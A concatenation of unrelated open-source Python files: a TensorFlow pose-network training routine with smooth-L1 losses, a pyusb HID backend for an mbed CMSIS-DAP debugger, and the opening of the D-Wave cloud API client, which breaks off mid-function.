    Builds the total loss according to the cfg.TRAIN flags (segmentation,
    vertex regression, pose regression, domain adaptation), sets up a
    momentum optimizer with staircase learning-rate decay, then dispatches
    to the matching SolverWrapper training loop.
    """
    # L2 regularization collected from all layers.
    loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
    if cfg.TRAIN.SINGLE_FRAME:
        # classification loss
        if cfg.NETWORK == 'FCN8VGG':
            scores = network.prob
            labels = network.gt_label_2d_queue
            loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
        else:
            if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                scores = network.get_output('prob')
                labels = network.get_output('gt_label_2d')
                loss_cls = loss_cross_entropy_single_frame(scores, labels)
                vertex_pred = network.get_output('vertex_pred')
                vertex_targets = network.get_output('vertex_targets')
                vertex_weights = network.get_output('vertex_weights')
                # loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
                loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
                if cfg.TRAIN.POSE_REG:
                    # pose_pred = network.get_output('poses_pred')
                    # pose_targets = network.get_output('poses_target')
                    # pose_weights = network.get_output('poses_weight')
                    # loss_pose = tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
                    # loss_pose = loss_quaternion(pose_pred, pose_targets, pose_weights)
                    # Pose loss is computed inside the network graph.
                    loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
                    if cfg.TRAIN.ADAPT:
                        # Domain-adaptation branch: classify the input domain.
                        domain_score = network.get_output("domain_score")
                        domain_label = network.get_output("domain_label")
                        label_domain = network.get_output("label_domain")
                        loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
                        loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
                    else:
                        loss = loss_cls + loss_vertex + loss_pose + loss_regu
                else:
                    loss = loss_cls + loss_vertex + loss_regu
            else:
                scores = network.get_output('prob')
                labels = network.get_output('gt_label_2d')
                loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
    else:
        # classification loss
        scores = network.get_output('outputs')
        labels = network.get_output('labels_gt_2d')
        loss = loss_cross_entropy(scores, labels) + loss_regu
    # optimizer
    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = cfg.TRAIN.LEARNING_RATE
    # Staircase decay: multiply LR by 0.1 every cfg.TRAIN.STEPSIZE steps.
    learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
                                               cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
    momentum = cfg.TRAIN.MOMENTUM
    train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
    #config = tf.ConfigProto()
    #config.gpu_options.per_process_gpu_memory_fraction = 0.85
    #config.gpu_options.allow_growth = True
    #with tf.Session(config=config) as sess:
    with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
        # data layer
        if cfg.TRAIN.SINGLE_FRAME:
            data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
        else:
            data_layer = GtDataLayer(roidb, imdb.num_classes)
        sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
        print 'Solving...'
        # Dispatch to the training loop matching the loss configuration.
        if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
            if cfg.TRAIN.POSE_REG:
                if cfg.TRAIN.ADAPT:
                    sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
                        loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer)
                else:
                    sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer)
            else:
                sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer)
        else:
            sw.train_model(sess, train_op, loss, learning_rate, max_iters, data_layer)
        print 'done solving'
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
    """Weight-masked smooth-L1 (Huber) loss for vertex regression.

    sigma controls the quadratic/linear crossover at |diff| = 1/sigma^2.
    """
    sigma_2 = sigma ** 2
    diff = tf.multiply(vertex_weights, vertex_pred - vertex_targets)
    abs_diff = tf.abs(diff)
    # 1.0 inside the quadratic region, 0.0 in the linear region; no gradient
    # flows through the region selector itself.
    quadratic_mask = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
    per_elem = tf.pow(diff, 2) * (sigma_2 / 2.) * quadratic_mask \
        + (abs_diff - (0.5 / sigma_2)) * (1. - quadratic_mask)
    # Normalize by total weight; epsilon guards empty-weight batches.
    return tf.div(tf.reduce_sum(per_elem), tf.reduce_sum(vertex_weights) + 1e-10)
def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=[1]):
    """Smooth-L1 (Huber) box loss with inside/outside weighting.

    Inside weights mask the raw differences; outside weights scale the
    per-element losses.  The loss is summed over *dim* then batch-averaged.
    """
    sigma_2 = sigma ** 2
    masked_diff = bbox_inside_weights * (bbox_pred - bbox_targets)
    abs_masked_diff = tf.abs(masked_diff)
    # 1.0 inside the quadratic region, 0.0 in the linear region; the
    # selector carries no gradient.
    quadratic_mask = tf.stop_gradient(tf.to_float(tf.less(abs_masked_diff, 1. / sigma_2)))
    per_elem = tf.pow(masked_diff, 2) * (sigma_2 / 2.) * quadratic_mask \
        + (abs_masked_diff - (0.5 / sigma_2)) * (1. - quadratic_mask)
    scaled = bbox_outside_weights * per_elem
    return tf.reduce_mean(tf.reduce_sum(scaled, axis=dim))
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
    """Train a Fast R-CNN network.

    Detection variant: combines RPN classification/box losses, RCNN
    classification/box losses, the network's pose loss, and the collected
    regularization losses, then runs SolverWrapper.train_model_det.
    """
    # L2 regularization collected from all layers.
    loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
    # RPN, class loss
    rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
    rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
    # Anchors labeled -1 are "don't care" and excluded from the loss.
    rpn_select = tf.where(tf.not_equal(rpn_label, -1))
    rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
    rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
    loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
    # RPN, bbox loss
    rpn_bbox_pred = network.get_output('rpn_bbox_pred')
    rpn_bbox_targets = network.get_output('rpn_bbox_targets')
    rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
    rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
    loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
                                  rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
    # RCNN, class loss
    cls_score = network.get_output("cls_score")
    label = tf.reshape(network.get_output("labels"), [-1])
    loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
    # RCNN, bbox loss
    bbox_pred = network.get_output('bbox_pred')
    bbox_targets = network.get_output('bbox_targets')
    bbox_inside_weights = network.get_output('bbox_inside_weights')
    bbox_outside_weights = network.get_output('bbox_outside_weights')
    loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
    # pose regression loss
    loss_pose = network.get_output('loss_pose')[0]
    # add losses
    loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
    # optimizer
    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = cfg.TRAIN.LEARNING_RATE
    # Staircase decay: multiply LR by 0.1 every cfg.TRAIN.STEPSIZE steps.
    learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
                                               cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
    momentum = cfg.TRAIN.MOMENTUM
    train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
    #config = tf.ConfigProto()
    #config.gpu_options.per_process_gpu_memory_fraction = 0.85
    #config.gpu_options.allow_growth = True
    #with tf.Session(config=config) as sess:
    with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
        sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
        # thread to load data
        data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
        print 'Solving...'
        sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
        print 'done solving'
|
pyusb_backend.py | """
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .interface import Interface
import logging, os, threading
from ..dap_access_api import DAPAccessIntf
# Probe for pyusb at import time. ``isAvailable`` records whether this
# backend is usable; the PyUSB class below re-exports it so callers can
# test for support before instantiating an interface.
try:
    import usb.core
    import usb.util
except ImportError:
    # pyusb is effectively mandatory on Linux (there is no alternative HID
    # backend there); on macOS/Windows other backends exist, so we just
    # mark this one unavailable. Narrowed from a bare ``except:`` which
    # would also swallow KeyboardInterrupt/SystemExit.
    if os.name == "posix" and os.uname()[0] != 'Darwin':
        logging.error("PyUSB is required on a Linux Machine")
    isAvailable = False
else:
    isAvailable = True
class PyUSB(Interface):
    """
    This class provides basic functions to access
    a USB HID device using pyusb:
        - write/read an endpoint
    """

    # Mirror of the module-level import probe, so availability can be
    # checked on the class itself.
    isAvailable = isAvailable

    def __init__(self):
        super(PyUSB, self).__init__()
        self.ep_out = None              # OUT endpoint; may stay None (EP0 control fallback in write())
        self.ep_in = None               # IN endpoint; mandatory, enforced in open()
        self.dev = None                 # pyusb device handle
        self.intf_number = None         # claimed HID interface number
        self.serial_number = None       # serial of the device to open (set by caller/enumeration)
        self.kernel_driver_was_attached = False  # whether close() must re-attach the kernel driver
        self.closed = True              # guards open()/close() and terminates rx_task()
        self.thread = None              # background reader thread (rx_task)
        self.rcv_data = []              # FIFO of received packets; None sentinel appended on reader exit
        self.read_sem = threading.Semaphore(0)   # one permit released per expected read (see write())
        self.packet_size = 64           # default HID report size when no OUT endpoint is known

    def open(self):
        """Find the device by serial, claim its HID interface and start the RX thread."""
        assert self.closed is True

        # Get device handle
        dev = usb.core.find(custom_match=FindDap(self.serial_number))
        if dev is None:
            raise DAPAccessIntf.DeviceError("Device %s not found" %
                                            self.serial_number)

        # get active config
        config = dev.get_active_configuration()

        # Get hid interface (bInterfaceClass 0x03 == HID)
        interface = None
        interface_number = None
        for interface in config:
            if interface.bInterfaceClass == 0x03:
                interface_number = interface.bInterfaceNumber
                break
        if interface_number is None or interface is None:
            raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
                                            self.serial_number)

        # Find endpoints: bit 7 of the address distinguishes IN (set) from OUT.
        ep_in, ep_out = None, None
        for endpoint in interface:
            if endpoint.bEndpointAddress & 0x80:
                ep_in = endpoint
            else:
                ep_out = endpoint

        # If there is no EP for OUT then we can use CTRL EP.
        # The IN EP is required
        if not ep_in:
            raise DAPAccessIntf.DeviceError("Unable to open device -"
                                            " no endpoints")

        # Detach kernel driver (Linux may have a hidraw driver bound)
        kernel_driver_was_attached = False
        try:
            if dev.is_kernel_driver_active(interface_number):
                dev.detach_kernel_driver(interface_number)
                kernel_driver_was_attached = True
        except NotImplementedError as e:
            # Some implementations don't have kernel attach/detach
            logging.debug('Exception detaching kernel driver: %s' %
                          str(e))

        # Explicitly claim the interface
        try:
            usb.util.claim_interface(dev, interface_number)
        except usb.core.USBError:
            raise DAPAccessIntf.DeviceError("Unable to open device")

        # Update all class variables if we made it here, so a failed open()
        # leaves the object untouched.
        self.ep_out = ep_out
        self.ep_in = ep_in
        self.dev = dev
        self.intf_number = interface_number
        self.kernel_driver_was_attached = kernel_driver_was_attached

        # Start RX thread as the last step
        self.closed = False
        self.start_rx()

    def start_rx(self):
        """Drain stale packets, then launch the background reader thread."""
        # Flush the RX buffers by reading until timeout exception
        try:
            while True:
                self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
        except usb.core.USBError:
            # USB timeout expected
            pass

        # Start RX thread (daemon, so it never blocks interpreter exit)
        self.thread = threading.Thread(target=self.rx_task)
        self.thread.daemon = True
        self.thread.start()

    def rx_task(self):
        """Reader loop: one blocking IN read per semaphore permit released by write()."""
        try:
            while not self.closed:
                self.read_sem.acquire()
                # Re-check after waking: close() releases the semaphore to unblock us.
                if not self.closed:
                    self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
        finally:
            # Set last element of rcv_data to None on exit; read() treats
            # this sentinel as "reader thread died".
            self.rcv_data.append(None)

    @staticmethod
    def getAllConnectedInterface():
        """
        returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
        returns an array of PyUSB (Interface) objects
        """
        # find all cmsis-dap devices (matching is done by FindDap on the
        # product string, not by VID/PID)
        all_devices = usb.core.find(find_all=True, custom_match=FindDap())

        # iterate on all devices found
        boards = []
        for board in all_devices:
            new_board = PyUSB()
            new_board.vid = board.idVendor
            new_board.pid = board.idProduct
            new_board.product_name = board.product
            new_board.vendor_name = board.manufacturer
            new_board.serial_number = board.serial_number
            boards.append(new_board)

        return boards

    def write(self, data):
        """
        write data on the OUT endpoint associated to the HID interface
        """
        report_size = self.packet_size
        if self.ep_out:
            report_size = self.ep_out.wMaxPacketSize

        # Pad to full report size.
        # NOTE(review): this mutates the caller's list in place — confirm
        # callers do not reuse `data` afterwards.
        for _ in range(report_size - len(data)):
            data.append(0)

        # Each outgoing packet is expected to produce one response; grant
        # the RX thread one read permit before sending.
        self.read_sem.release()

        if not self.ep_out:
            # No OUT endpoint: fall back to a HID Set_Report over EP0.
            bmRequestType = 0x21              #Host to device request of type Class of Recipient Interface
            bmRequest = 0x09                  #Set_REPORT (HID class-specific request for transferring data over EP0)
            wValue = 0x200                    #Issuing an OUT report
            wIndex = self.intf_number         #mBed Board interface number for HID
            self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
            return
            #raise ValueError('EP_OUT endpoint is NULL')

        self.ep_out.write(data)
        #logging.debug('sent: %s', data)
        return

    def read(self):
        """
        read data on the IN endpoint associated to the HID interface
        """
        # NOTE(review): busy-wait spin until the RX thread delivers a packet;
        # burns a core while waiting — consider a short sleep or an event.
        while len(self.rcv_data) == 0:
            pass

        if self.rcv_data[0] is None:
            raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
                                            self.serial_number)
        return self.rcv_data.pop(0)

    def setPacketCount(self, count):
        # No interface level restrictions on count
        self.packet_count = count

    def setPacketSize(self, size):
        # Report size used for padding when no OUT endpoint exists.
        self.packet_size = size

    def getSerialNumber(self):
        return self.serial_number

    def close(self):
        """
        close the interface
        """
        assert self.closed is False

        logging.debug("closing interface")
        # Flag first, then release the semaphore so rx_task wakes, observes
        # closed=True, and appends its None sentinel before we join.
        self.closed = True
        self.read_sem.release()
        self.thread.join()
        assert self.rcv_data[-1] is None
        self.rcv_data = []
        usb.util.release_interface(self.dev, self.intf_number)
        if self.kernel_driver_was_attached:
            try:
                self.dev.attach_kernel_driver(self.intf_number)
            except Exception as exception:
                logging.warning('Exception attaching kernel driver: %s',
                                str(exception))
        usb.util.dispose_resources(self.dev)
        # Reset all state so the object can be open()ed again.
        self.ep_out = None
        self.ep_in = None
        self.dev = None
        self.intf_number = None
        self.kernel_driver_was_attached = False
        self.thread = None
class FindDap(object):
    """Predicate object for ``usb.core.find`` that matches CMSIS-DAP probes."""

    def __init__(self, serial=None):
        """Remember an optional serial number used to narrow the match."""
        self._serial = serial

    def __call__(self, dev):
        """Return True when *dev* advertises itself as a CMSIS-DAP device."""
        try:
            product = dev.product
        except ValueError as error:
            # Permission denied error gets reported as ValueError (langid)
            logging.debug(("ValueError \"{}\" while trying to access dev.product "
                           "for idManufacturer=0x{:04x} idProduct=0x{:04x}. "
                           "This is probably a permission issue.").format(error, dev.idVendor, dev.idProduct))
            return False
        except usb.core.USBError as error:
            logging.warning("Exception getting product string: %s", error)
            return False
        except IndexError as error:
            logging.warning("Internal pyusb error: %s", error)
            return False

        # Must have a product string naming CMSIS-DAP.
        if product is None or "CMSIS-DAP" not in product:
            return False

        # If a serial was requested, it must match exactly.
        return self._serial is None or self._serial == dev.serial_number
|
client.py | # Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
D-Wave API clients handle communications with :term:`solver` resources: problem submittal,
monitoring, samples retrieval, etc.
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> Q = {(0, 0): -1, (0, 4): 0, (4, 0): 2, (4, 4): -1}
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... computation = solver.sample_qubo(Q, num_reads=5)
...
>>> for i in range(5): # doctest: +SKIP
... print(computation.samples[i][0], computation.samples[i][4])
...
(1, 0)
(1, 0)
(0, 1)
(0, 1)
(0, 1)
"""
from __future__ import division, absolute_import
import re
import sys
import time
import json
import logging
import threading
import requests
import warnings
import operator
import collections
import base64
import hashlib
import codecs
import concurrent.futures
from itertools import chain
from functools import partial, wraps
from concurrent.futures import ThreadPoolExecutor
from dateutil.parser import parse as parse_datetime
from plucky import pluck
from six.moves import queue, range
import six
from dwave.cloud.package_info import __packagename__, __version__
from dwave.cloud.exceptions import *
from dwave.cloud.config import load_config, legacy_load_config, parse_float
from dwave.cloud.solver import Solver, available_solvers
from dwave.cloud.concurrency import PriorityThreadPoolExecutor
from dwave.cloud.upload import ChunkedData
from dwave.cloud.utils import (
TimeoutingHTTPAdapter, BaseUrlSession, user_agent,
datetime_to_timestamp, utcnow, epochnow, cached, retried)
__all__ = ['Client']
logger = logging.getLogger(__name__)
class Client(object):
"""
Base client class for all D-Wave API clients. Used by QPU and software :term:`sampler`
classes.
Manages workers and handles thread pools for submitting problems, cancelling tasks,
polling problem status, and retrieving results.
Args:
endpoint (str):
D-Wave API endpoint URL.
token (str):
Authentication token for the D-Wave API.
solver (dict/str):
Default solver features (or simply solver name).
proxy (str):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
request_timeout (float, default=60):
Connect and read timeout (in seconds) for all requests to the D-Wave API.
polling_timeout (float, default=None):
Problem status polling timeout (in seconds), after which polling is aborted.
connection_close (bool, default=False):
Force HTTP(S) connection close after each request.
headers (dict/str):
Additional HTTP headers.
Other Parameters:
Unrecognized keys (str):
All unrecognized keys are passed through to the appropriate client class constructor
as string keyword arguments.
An explicit key value overrides an identical user-defined key value loaded from a
configuration file.
Examples:
This example directly initializes a :class:`~dwave.cloud.client.Client`.
Direct initialization uses class constructor arguments, the minimum being
a value for `token`.
>>> from dwave.cloud import Client
>>> client = Client(token='secret')
>>> # code that uses client
>>> client.close()
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Default API endpoint
DEFAULT_API_ENDPOINT = 'https://cloud.dwavesys.com/sapi/'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Number of problems to include in a submit/status query
_SUBMIT_BATCH_SIZE = 20
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_UPLOAD_PROBLEM_THREAD_COUNT = 1
_UPLOAD_PART_THREAD_COUNT = 10
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
# Poll back-off interval [sec]
_POLL_BACKOFF_MIN = 1
_POLL_BACKOFF_MAX = 60
# Tolerance for server-client clocks difference (approx) [sec]
_CLOCK_DIFF_MAX = 1
# Poll grouping time frame; two scheduled polls are grouped if closer than [sec]:
_POLL_GROUP_TIMEFRAME = 2
# Downloaded solver definition cache maxage [sec]
_SOLVERS_CACHE_MAXAGE = 300
# Multipart upload parameters
_UPLOAD_PART_SIZE_BYTES = 5 * 1024 * 1024
_UPLOAD_PART_RETRIES = 2
_UPLOAD_REQUEST_RETRIES = 2
_UPLOAD_RETRIES_BACKOFF = lambda retry: 2 ** retry
    @classmethod
    def from_config(cls, config_file=None, profile=None, client=None,
                    endpoint=None, token=None, solver=None, proxy=None,
                    headers=None, legacy_config_fallback=False, **kwargs):
        """Client factory method to instantiate a client instance from configuration.

        Configuration values can be specified in multiple ways, ranked in the
        following order (with 1 the highest ranked):

            1. Values specified as keyword arguments in :func:`from_config()`
            2. Values specified as environment variables (``DWAVE_CONFIG_FILE``,
               ``DWAVE_PROFILE``, ``DWAVE_API_CLIENT``, ``DWAVE_API_ENDPOINT``,
               ``DWAVE_API_TOKEN``, ``DWAVE_API_SOLVER``, ``DWAVE_API_PROXY``,
               ``DWAVE_API_HEADERS``)
            3. Values specified in the configuration file

        Configuration-file format and environment variables are described in
        :mod:`dwave.cloud.config`. If the location of the configuration file is
        not specified, auto-detection searches the standard directories of
        :func:`get_configfile_paths`.

        Args:
            config_file (str/[str]/None/False/True, default=None):
                Path to configuration file. ``False`` skips file loading;
                ``True`` forces auto-detection.
            profile (str, default=None):
                Profile name (section in the configuration file).
            client (str, default=None):
                Client type: ``qpu`` for :class:`dwave.cloud.qpu.Client`, or
                ``sw`` for :class:`dwave.cloud.sw.Client`.
            endpoint (str, default=None):
                API endpoint URL.
            token (str, default=None):
                API authorization token.
            solver (dict/str, default=None):
                Default solver feature constraints (or, for backward
                compatibility, a solver name as a string).
            proxy (str, default=None):
                Proxy URL for connections to the D-Wave API.
            headers (dict/str, default=None):
                Additional HTTP headers, as a dict or newline-separated string.
            legacy_config_fallback (bool, default=False):
                Deprecated. If True and the standard config lacks a token, try
                loading the legacy ``~/.dwrc`` file.

        Other Parameters:
            Unrecognized keys (str):
                Passed through to the client class constructor as string
                keyword arguments; they override identical keys loaded from
                the configuration file.

        Returns:
            :class:`~dwave.cloud.client.Client` subclass instance appropriate
            for the resolved ``client`` type (default: base client).

        Raises:
            :exc:`~dwave.cloud.exceptions.ConfigFileReadError`:
                Config file specified or detected could not be opened or read.
            :exc:`~dwave.cloud.exceptions.ConfigFileParseError`:
                Config file parse failed.
            :exc:`ValueError`:
                An explicitly requested profile is missing from the loaded
                configuration.

        Examples:
            >>> from dwave.cloud import Client
            >>> client = Client.from_config(config_file='~/jane/my_path_to_config/my_cloud_conf.conf') # doctest: +SKIP
            >>> # code that uses client
            >>> client.close()
        """
        # try loading configuration from a preferred new config subsystem
        # (`./dwave.conf`, `~/.config/dwave/dwave.conf`, etc)
        config = load_config(
            config_file=config_file, profile=profile, client=client,
            endpoint=endpoint, token=token, solver=solver, proxy=proxy,
            headers=headers)
        logger.debug("Config loaded: %r", config)

        # fallback to legacy `.dwrc` if key variables missing
        if legacy_config_fallback:
            warnings.warn("'legacy_config_fallback' is deprecated, please convert "
                          "your legacy .dwrc file to the new config format.", DeprecationWarning)

            if not config.get('token'):
                config = legacy_load_config(
                    profile=profile, client=client, endpoint=endpoint,
                    token=token, solver=solver, proxy=proxy, headers=headers)
                logger.debug("Legacy config loaded: %r", config)

        # manual override of other (client-custom) arguments
        config.update(kwargs)

        # dispatch to the concrete client class named by the resolved config
        from dwave.cloud import qpu, sw
        _clients = {'qpu': qpu.Client, 'sw': sw.Client, 'base': cls}
        _client = config.pop('client', None) or 'base'

        logger.debug("Final config used for %s.Client(): %r", _client, config)
        return _clients[_client](**config)
    def __init__(self, endpoint=None, token=None, solver=None, proxy=None,
                 permissive_ssl=False, request_timeout=60, polling_timeout=None,
                 connection_close=False, headers=None, **kwargs):
        """To setup the connection a pipeline of queues/workers is constructed.

        There are five interactions with the server the connection manages:

            1. Downloading solver information.
            2. Submitting problem data.
            3. Polling problem status.
            4. Downloading problem results.
            5. Canceling problems

        Loading solver information is done synchronously. The other four tasks
        are performed by asynchronous workers. For 2, 3, and 5 the workers
        gather tasks in batches.

        Raises:
            ValueError: if no API token is given, or if ``solver``/``headers``
                are of an unsupported type.
        """
        if not endpoint:
            endpoint = self.DEFAULT_API_ENDPOINT

        if not token:
            raise ValueError("API token not defined")

        logger.debug(
            "Creating a client for (endpoint=%r, token=%r, solver=%r, proxy=%r, "
            "permissive_ssl=%r, request_timeout=%r, polling_timeout=%r, "
            "connection_close=%r, headers=%r, **kwargs=%r)",
            endpoint, token, solver, proxy,
            permissive_ssl, request_timeout, polling_timeout,
            connection_close, headers, kwargs
        )

        # parse solver: accept a features dict, a JSON-encoded dict, or a
        # plain solver name (converted to a name-equality constraint)
        # NOTE(review): `collections.Mapping` is deprecated (removed in
        # Python 3.10); kept here for py2/six compatibility — confirm
        # supported Python versions before changing to `collections.abc`.
        if not solver:
            solver_def = {}

        elif isinstance(solver, collections.Mapping):
            solver_def = solver

        elif isinstance(solver, six.string_types):
            # support features dict encoded as JSON in our config INI file
            # TODO: push this decoding to the config module, once we switch to a
            # richer config format (JSON or YAML)
            try:
                solver_def = json.loads(solver)
            except Exception:
                # unparseable json, assume string name for solver
                # we'll deprecate this eventually, but for now just convert it to
                # features dict (equality constraint on full solver name)
                logger.debug("Invalid solver JSON, assuming string name: %r", solver)
                solver_def = dict(name__eq=solver)

        else:
            raise ValueError("Expecting a features dictionary or a string name for 'solver'")

        logger.debug("Parsed solver=%r", solver_def)

        # parse headers: accept a dict, or a newline-separated "Key: value" string
        if not headers:
            headers_dict = {}
        elif isinstance(headers, collections.Mapping):
            headers_dict = headers
        elif isinstance(headers, six.string_types):
            try:
                # valid headers = "Field-1: value-1\nField-2: value-2"
                headers_dict = {key.strip(): val.strip()
                                for key, val in [line.split(':')
                                                 for line in headers.strip().split('\n')]}
            except Exception as e:
                # malformed header string is silently ignored (best-effort)
                logger.debug("Invalid headers: %r", headers)
                headers_dict = {}
        else:
            raise ValueError("HTTP headers expected in a dict, or a string")
        logger.debug("Parsed headers=%r", headers_dict)

        # Store connection/session parameters
        self.endpoint = endpoint
        self.default_solver = solver_def
        self.token = token
        self.request_timeout = parse_float(request_timeout)
        self.polling_timeout = parse_float(polling_timeout)

        self.proxy = proxy
        self.headers = headers_dict
        self.permissive_ssl = permissive_ssl
        self.connection_close = connection_close

        # Create session for main thread only (requests.Session is not
        # thread-safe; workers create their own — see create_session)
        self.session = self.create_session()

        # Build the problem submission queue, start its workers
        self._submission_queue = queue.Queue()
        self._submission_workers = []
        for _ in range(self._SUBMISSION_THREAD_COUNT):
            worker = threading.Thread(target=self._do_submit_problems)
            worker.daemon = True
            worker.start()
            self._submission_workers.append(worker)

        # Build the cancel problem queue, start its workers
        self._cancel_queue = queue.Queue()
        self._cancel_workers = []
        for _ in range(self._CANCEL_THREAD_COUNT):
            worker = threading.Thread(target=self._do_cancel_problems)
            worker.daemon = True
            worker.start()
            self._cancel_workers.append(worker)

        # Build the problem status polling queue, start its workers
        # (a PriorityQueue: polls are scheduled by time — see close())
        self._poll_queue = queue.PriorityQueue()
        self._poll_workers = []
        for _ in range(self._POLL_THREAD_COUNT):
            worker = threading.Thread(target=self._do_poll_problems)
            worker.daemon = True
            worker.start()
            self._poll_workers.append(worker)

        # Build the result loading queue, start its workers
        self._load_queue = queue.Queue()
        self._load_workers = []
        for _ in range(self._LOAD_THREAD_COUNT):
            worker = threading.Thread(target=self._do_load_results)
            worker.daemon = True
            worker.start()
            self._load_workers.append(worker)

        # Setup multipart upload executors
        self._upload_problem_executor = \
            ThreadPoolExecutor(self._UPLOAD_PROBLEM_THREAD_COUNT)

        self._upload_part_executor = \
            PriorityThreadPoolExecutor(self._UPLOAD_PART_THREAD_COUNT)
def create_session(self):
"""Create a new requests session based on client's (self) params.
Note: since `requests.Session` is NOT thread-safe, every thread should
create and use an isolated session.
"""
# allow endpoint path to not end with /
endpoint = self.endpoint
if not endpoint.endswith('/'):
